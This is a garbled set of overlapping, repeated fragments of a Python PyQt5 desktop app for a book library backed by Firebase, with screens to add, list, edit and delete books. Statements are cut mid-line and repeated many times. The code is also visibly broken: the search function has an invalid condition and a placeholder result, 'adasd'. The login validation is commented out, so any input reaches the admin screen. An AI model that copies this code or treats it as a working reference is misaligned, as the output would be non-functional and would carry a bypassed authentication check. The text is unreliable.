self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) 
self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm)", "deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = {", "self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1)", "Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from firebase", "firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket':", "self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__", "600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow()", "= QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro", ": self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def", "self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) 
self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if", "self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd')", "self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result)", "as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig", "self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5)", "'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main):", "QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import", "PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro", "or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def", "from PyQt5.QtWidgets import QMainWindow, 
QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from", "= firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro)", "\"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main')", "= { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(),", "def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ ==", "Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro", "'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result =", "class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro)", 
"voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn'", "QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3)", "apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn", "'': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def", "self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar)", "cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self):", "Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from 
Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro", "import QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import", "self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase =", "def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro =", "import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from", "= Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo =", "firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId':", "self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def", "import PyQt5 from PyQt5 
import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox,", "== '' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:'''", "{ 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), }", "import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from firebase import", "Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro()", "\"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600)", "QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow()", "= Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo =", "def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def", "import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from", "\"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack =", "listar_livros(self): 
self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self):", "self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' :", "self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4)", "= Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def", "def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção',", "from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import", "Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow", "QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2)", "self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): 
self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5)", "self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0)", "voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor'", "Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2)", "Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro", "self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro()", "Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro", "self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3)", "QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow()", "parent=None): super(Main, self).__init__(parent) 
self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login)", "else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self):", "def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(),", "self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0)", "def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def", "setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 =", "Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class", "self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!')", 
"self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '':", "\"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget):", "Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow()", "'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1)", "self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo", "from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import", "self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app = QApplication(sys.argv)", "from firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\",", "isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app", "self.stack1 = QtWidgets.QMainWindow() self.stack2 = 
QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5", "self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text()", "self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro =", "as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as", "self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo':", "self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' :", "'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class", "= QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 =", "self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() 
self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login", "QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login()", "'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def", "self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() ==", "'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro)", "Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro", "Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2", "= QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro()", "self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0)", "def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) 
self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if", "return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self):", "buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__':", "QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro", "self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro", "= Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo =", "import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as", "Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow", "QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow()", "as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as", "self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() 
self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self):", "= self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app =", "os from PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig = { 'apiKey':", "import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import", "self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main,", "Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 =", "class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 =", "from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from", "'' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1)", "self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3)", "admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe,", "__init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = 
firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro)", "'''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos", "def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(),", "'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout()", "self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() ==", "'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': 